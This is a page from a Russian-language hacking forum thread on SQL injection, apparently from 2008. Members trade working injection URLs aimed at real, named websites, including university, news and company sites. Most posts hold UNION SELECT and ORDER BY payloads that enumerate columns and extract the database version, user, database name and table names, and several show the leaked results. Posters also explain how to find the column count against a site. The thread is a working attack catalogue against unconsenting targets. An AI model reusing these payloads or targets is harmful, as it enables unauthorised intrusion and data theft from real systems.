FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 709 из 1602

709

Опции темы

Поиск в этой теме

Опции просмотра

28.12.2008, 16:03

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

MSSQL

Цитата:

http://www.sunion.warwick.ac.uk/archery/records/byarcher_viewscore.php?id=81%20or%201=@@version--

Цитата:

28.12.2008, 16:44

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

http://presscenter.kz/index.php?show=news&id=1+union+select+1,2,3,4,5--

нихера не понял...

28.12.2008, 19:11

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Цитата:

Сообщение от Gemini12

http://presscenter.kz/index.php?show=news&id=1+union+select+1,2,3,4,5--

нихера не понял...

Код:

http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+CONCAT(0x3a,Version(),0x3a),2,3,4,5,6,7,8,9/*

Version() - 5.0.19
Database() - presscenter

Код:

http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables+limit+17,1/*

Последний раз редактировалось R1dex; 28.12.2008 в 19:14..

28.12.2008, 18:49

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Цитата:

http://www.exhibitionculture.arts.gla.ac.uk/gallery.php?gid=309

User exhibitions_user@localhost
Version: 5.0.22-Debian_0ubuntu6.06.11-log
Dbname: exhibitions

28.12.2008, 19:46

~~F4R~~

Banned

Регистрация: 20.06.2008

Сообщений: 296

Провел на форуме:
1385078

Репутация: 126

как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!

28.12.2008, 19:51

masternet

Участник форума

Регистрация: 18.05.2008

Сообщений: 130

Провел на форуме:
1113633

Репутация: 155

Цитата:

Сообщение от F4R

как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!

а ты уверен?ты встречался со скулями где например вместо ошибки надпись "Хакинг атемптинг" или тому подобного..
так же и здесь..это не стандартная скуля..
а цифра один экранируется в ошибке..
----
Germani если есть разница вывода то скуля(т.е. если на 1 есть надпись,а на 999 нет,или наоборот)

Последний раз редактировалось masternet; 28.12.2008 в 20:07..

28.12.2008, 19:59

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Да кстати! Я встречался с такими, на ntu.kz, в случае хоть малейшей пробы на скулю, пишет что-то вроди: "Hacker's attack attempt, admin was informed"

28.12.2008, 20:27

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

"Компания АМТЭЛ. С первых дней основным видом деятельности компании являются сетевые проекты, поставка серверов и систем высшего класса отказоустойчивости..."

Код:

http://www.amtel.ru/page.php?id=-1+union+select+version()/*

Цитата:

Сообщение от F4R

как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!

Код:

http://presscenter.kz/index.php?show=news&id=-1+order+by+10/*

Код:

http://presscenter.kz/index.php?show=news&id=-1+order+by+9/*

28.12.2008, 21:40

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

http://www.izba.kz/ru/pages/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,user(),10,1 1,12,13,14,15,16,17,18,19,20--

4.1.22-STANDARD
siteis_user@localhost